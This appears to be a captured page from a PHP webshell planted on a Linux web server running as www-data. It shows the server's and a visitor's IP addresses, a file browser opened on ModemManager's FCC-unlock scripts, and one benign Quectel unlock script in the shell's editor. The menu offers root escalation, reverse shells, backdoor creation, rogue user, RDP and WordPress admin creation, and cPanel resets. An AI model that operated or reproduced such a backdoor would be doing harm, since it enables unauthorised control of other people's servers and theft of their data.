Linux ubuntu 6.8.0-90-generic #91-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 18 14:14:30 UTC 2025 x86_64
nginx/1.24.0
: 67.217.245.49 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
8.3.6
www-data
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
ModemManager /
fcc-unlock.available.d /
[ HOME SHELL ]
Name
Size
Permission
Action
03f0:4e1d
771
B
-rwxr-xr-x
105b
2.59
KB
-rwxr-xr-x
105b:e0ab
2.59
KB
-rwxr-xr-x
105b:e0c3
2.59
KB
-rwxr-xr-x
1199
771
B
-rwxr-xr-x
1199:9079
771
B
-rwxr-xr-x
14c3
2.32
KB
-rwxr-xr-x
14c3:4d75
2.32
KB
-rwxr-xr-x
1eac
765
B
-rwxr-xr-x
1eac:1001
765
B
-rwxr-xr-x
2c7c
615
B
-rwxr-xr-x
2c7c:030a
615
B
-rwxr-xr-x
413c:81a3
771
B
-rwxr-xr-x
413c:81a8
771
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 2c7c
#!/bin/sh # SPDX-License-Identifier: CC0-1.0 # 2022 Leah Oswald <mail@leahoswald.de> # # Queltec EM05-G FCC unlock mechanism # # require program name and at least 2 arguments [ $# -lt 2 ] && exit 1 # first argument is DBus path, not needed here shift # second and next arguments are control port names for PORT in "$@"; do # match port name echo "$PORT" | grep -q cdc-wdm && { CDC_WDM_PORT=$PORT break } done # fail if no cdc-wdm port exposed [ -n "$CDC_WDM_PORT" ] || exit 2 # run mbimcli operation mbimcli --device-open-proxy --device="/dev/$CDC_WDM_PORT" --quectel-set-radio-state=on exit $?
Close